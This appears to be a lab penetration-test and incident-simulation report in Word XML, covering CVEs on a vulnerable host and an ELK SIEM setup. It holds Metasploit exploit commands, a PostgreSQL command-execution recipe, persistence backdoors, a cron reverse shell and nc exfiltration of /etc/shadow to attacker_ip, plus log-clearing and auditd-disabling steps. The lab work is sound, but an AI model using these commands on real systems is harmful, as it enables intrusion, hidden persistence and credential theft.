    <w:p w14:paraId="097419E5" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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No firewall filtering detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46122475" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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No port obfuscation or service hiding mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D742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Security Implication: All ports follow traditional well-known assignments (no stealth or obfuscation); complete network visibility to attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2E8364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275809A3">
          <v:rect id="_x0000_i1042" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F737123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Finding 7: Aggressive Timing Template Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC8357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Scan completed in 8 seconds for top 1,000 ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB6EED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Security Implication: Host is highly responsive and network path is clear; ideal conditions for exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF59057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7776751F">
          <v:rect id="_x0000_i1043" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF121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Finding 8: ICMP Ping Bypass Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775647A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Host responds to ICMP echo requests and TCP probes on all active ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44070A0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Security Implication: No perimeter firewall detected; network segmentation absent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D18E298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16782E56">
          <v:rect id="_x0000_i1044" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB9CD9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Finding 9: Vulnerability Script Scanning Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5910002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NSE vulnerability scripts identified 10+ confirmed CVEs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E3A9A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CRITICAL CVEs Detected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFFCF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1. CVE-2007-2447 (Samba 3.0.20 RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C8DB16" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Username map script command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0289B3C9" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Remote code execution as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C2E2DC" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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No authentication required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A85FEA6" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Exploitability: Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5186DFE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2. CVE-2011-2523 (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vsftpd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2.3.4 Backdoor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4954B9" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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Backdoor in compromised package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E441DF1" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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Immediate root access via ":)" username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D6D22" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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Exploitability: Trivial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D908F3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3. CVE-2009-0196 (Apache 2.2.8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD3E17D" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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Multiple RCE vectors in modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E5972" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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Buffer overflows in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mod_usertrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E3A2682" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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Exploitability: Moderate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E416A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4. CVE-2009-3697 (PostgreSQL 8.2.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4444EA51" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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Authentication bypass via trust config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DDF860" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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UDF loading for system command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388E3146" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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Exploitability: Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42051F53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pict w14:anchorId="1B964753">
          <v:rect id="_x0000_i1045" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="598F854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Penetration Testing Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8AB43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Exploitation Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF2B9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All identified vulnerabilities confirmed exploitable with root access achieved:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11100" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="-99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2325"/>
        <w:gridCol w:w="2088"/>
        <w:gridCol w:w="3903"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="09788C1B" w14:textId="77777777" w:rsidTr="00C937F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C727D4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Vulnerability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4FB4E0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DACC71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E1E770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Proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="1F9DFBB2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A3A82B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Samba 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777AF2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CVE-2007-2447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B48388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✅ SUCCESS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26EEA4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whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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→ root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="7B51981E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CDA7B8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vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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Backdoor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A7FF56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CVE-2011-2523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FB3047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✅ SUCCESS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77E9D0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uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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=0 confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="7F42F555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45A2A6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Apache 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7D7592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Multiple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1455E1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✅ SUCCESS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2F6BAF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Code execution verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="1148BAB2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CAB923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PostgreSQL Bypass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2D45E9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CVE-2009-3697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DFDF72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✅ SUCCESS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8C1684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System commands executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E2EF1FE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Exploitation Time: &lt; 2 minutes to achieve root-level system compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A06610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Exploitation 1: Samba 3.0.20 RCE (CVE-2007-2447)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C46B5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Vulnerability: Username map script command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275775E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Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6152CB5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40500A8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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59B06D73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use exploit/multi/samba/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usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6063CC83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set RHOST 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA9A17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set LHOST 192.168.x.y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A4574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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B6159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set PAYLOAD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cmd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unix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reverse_netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34671BE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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A6ECF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Result: ✅ Root shell obtained</w:t>
      </w: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br/>
        <w:t>Proof:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DCF34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</w:p>
    <w:p w14:paraId="1F6EC6B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whoami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→ root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C90F1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id →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uid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=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77561983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Exploitation 2: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vsftpd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2.3.4 Backdoor (CVE-2011-2523)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1D9D2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Vulnerability: Backdoor in compromised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vsftpd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package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342347B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Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48835A8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7234AA1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use exploit/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unix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/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696ECF6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set RHOST 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B18B874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set LPORT 4445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E691FE4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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F9614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Result: ✅ Immediate root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5716509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Exploitation 3: PostgreSQL 8.2.5 Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D87C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Vulnerability: Default trust authentication and UDF loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED764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Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DFCEC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5A0D40C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psql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-h 192.168.x.x -U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postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4979DB0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CREATE FUNCTION system(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cstring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) RETURNS int AS 'libc.so.6', 'system' LANGUAGE c STRICT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D41D6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SELECT system('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whoami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');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E795A1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Result: ✅ System command execution as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postgres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user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1082752F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6F3B09D3">
          <v:rect id="_x0000_i1046" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D6488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Post-Exploitation Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A9C65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Persistence Mechanisms Installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762C2E9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1. SSH Key Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1804F98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11E493D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echo "ssh-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rsa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AAAA..." &gt;&gt; /root/.ssh/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authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09079D7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2. Cron Job Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04314863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71B2A32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*/5 * * * * /bin/bash -c 'bash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&gt;&amp; /dev/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attacker_ip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/4444 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D29066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3. Backdoor User Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E84A8E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3F81040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useradd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-m -p $(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openssl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passwd -1 password123) backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53843D3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usermod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aG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sudo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backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E059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4.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Systemd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Service Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6798F65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722FB0A3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[Unit]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A98442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Description=System Update Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7BEF4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After=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network.target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63973F7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C6AE624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[Service]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BBD1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Type=simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1962A05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ExecStart=/tmp/persistence_script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ADA98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Restart=always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4D9947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46F4D937">
          <v:rect id="_x0000_i1047" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FE0EB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Incident Simulation Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888293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Attack Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA345C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Stage 1: Reconnaissance (0-5 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B7DE3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7CD4F3C4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sS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192.168.x.x -p-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109895D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sV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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B9722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--script vuln 192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5E5270" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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Network scanning completes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D5299" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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12 open ports identified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A6B577" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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Services enumerated and mapped to CVEs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648C4FB3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Stage 2: Initial Access (5-10 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA6C14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5771243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Samba exploitation initiated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A88246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msfconsole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→ use exploit/multi/samba/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usermap_script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→ exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EA7BD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Reverse shell established on port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159E6FF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# Root access confirmed: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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→ root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3AA77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Stage 3: Privilege Escalation (10-12 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3737F579" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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Already running as root (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uid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=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0EA10" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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Escalation unnecessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B0501E" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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Full system access confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FE3C6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Stage 4: Persistence Installation (12-20 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5F38E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7F1689F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SSH key installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB8EF8E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echo "ssh-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rsa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..." &gt;&gt; /root/.ssh/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authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37CACE1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A500D7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Cron job creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C22276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crontab -</w:t>
      </w:r>
      <w:proofErr w:type="gram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e  </w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Add reverse shell every 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754FC1F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FD1D9B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Backdoor user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0099C3A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useradd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-m -s /bin/bash -p $(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openssl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passwd -1 password) backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F3C1C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35D962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# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0857527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cp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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persistence.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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etc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systemd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/system/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903891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systemctl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enable persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AE2D9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Stage 5: Defense Evasion (20-25 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301835A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2BCF8C4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Command history clearing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5445719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history -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0724442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cat /dev/null &gt; ~/.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bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1556E41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178CCA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System log clearing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524FE00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echo "" &gt; /var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D528A0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echo "" &gt; /var/log/syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42869A7E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echo "" &gt; /var/log/kern.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1AD1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CBA129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Service disablement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7968E0E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systemctl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stop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auditd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4789163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systemctl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disable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auditd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7127535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Stage 6: Data Exfiltration (25-35 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB606E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3E32B563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Sensitive data collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A65740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mkdir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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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/.exfil</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6120FAF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cp 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etc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/passwd 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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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/.exfil</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:p>
    <w:p w14:paraId="4947FDE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cp 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etc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/shadow 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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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/.exfil</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:p>
    <w:p w14:paraId="69E4D85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cp -r /root/.ssh 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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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/.exfil</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:p>
    <w:p w14:paraId="0B4C75B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F4DE8B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Data packaging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE4B30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tar -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czf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tmp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/data.tar.gz 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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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/.exfil</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:p>
    <w:p w14:paraId="72B40BF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nc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attacker_ip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9999 &lt; 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tmp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/data.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003D1F4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157.3 MB transferred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E611D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Stage 7: Verification (35-37 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C47CC5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1976D5F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Confirm persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFA11CE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crontab -</w:t>
      </w:r>
      <w:proofErr w:type="gram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l  </w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Verify backdoor entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A89FFD3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ps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aux | grep </w:t>
      </w:r>
      <w:proofErr w:type="gram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persistence  </w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Verify service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B28226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id </w:t>
      </w:r>
      <w:proofErr w:type="gram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sysadmin  </w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Verify backdoor user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBBF68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cat /root/.ssh/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authorized_</w:t>
      </w:r>
      <w:proofErr w:type="gram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keys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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Verify SSH access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE36E5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3A3DECAC">
          <v:rect id="_x0000_i1048" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BCC77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SIEM Implementation (ELK Stack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3CAC4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Architecture Deployed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAA9C74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</w:p>
    <w:p w14:paraId="4240D48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Filebeat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(Log Collection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24FB7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↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D0746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Logstash (Log Processing &amp; Parsing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750D66C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↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2CF3AE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Elasticsearch (Log Storage &amp; Indexing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8D18C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↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FC577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Kibana (Visualization &amp; Dashboards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B473E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Components Installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE5E0C" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Elasticsearch 7.17.9 (Port 9200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FACE00" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Distributed search and analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BD8F18" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Full-text indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E27754B" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Real-time analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB9576" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Logstash 7.17.9 (Port 5000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F31BA31" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Data processing pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C0B9F9" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Log parsing (grok patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AB6CF0" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Data enrichment and transformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607EE0BE" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Kibana 7.17.9 (Port 5601)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E80C3A5" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Web-based dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE7CFD" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Log visualization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6DCD0D" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
